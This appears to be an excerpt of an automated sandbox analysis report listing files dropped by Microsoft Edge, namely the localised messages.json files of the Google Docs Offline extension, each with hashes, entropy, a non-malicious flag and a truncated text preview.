                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):851
                                                        Entropy (8bit):4.4858053753176526
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\en_GB\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):848
                                                        Entropy (8bit):4.494568170878587
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\en_US\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1425
                                                        Entropy (8bit):4.461560329690825
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\es\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):961
                                                        Entropy (8bit):4.537633413451255
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\es_419\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):959
                                                        Entropy (8bit):4.570019855018913
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\et\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):968
                                                        Entropy (8bit):4.633956349931516
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\eu\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):838
                                                        Entropy (8bit):4.4975520913636595
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\fa\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1305
                                                        Entropy (8bit):4.673517697192589
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\fi\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):911
                                                        Entropy (8bit):4.6294343834070935
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\fil\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):939
                                                        Entropy (8bit):4.451724169062555
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\fr\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):977
                                                        Entropy (8bit):4.622066056638277
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\fr_CA\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):972
                                                        Entropy (8bit):4.621319511196614
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\gl\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):990
                                                        Entropy (8bit):4.497202347098541
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\gu\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1658
                                                        Entropy (8bit):4.294833932445159
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\hi\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1672
                                                        Entropy (8bit):4.314484457325167
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\hr\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):935
                                                        Entropy (8bit):4.6369398601609735
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\hu\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1065
                                                        Entropy (8bit):4.816501737523951
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\hy\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2771
                                                        Entropy (8bit):3.7629875118570055
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\id\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):858
                                                        Entropy (8bit):4.474411340525479
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
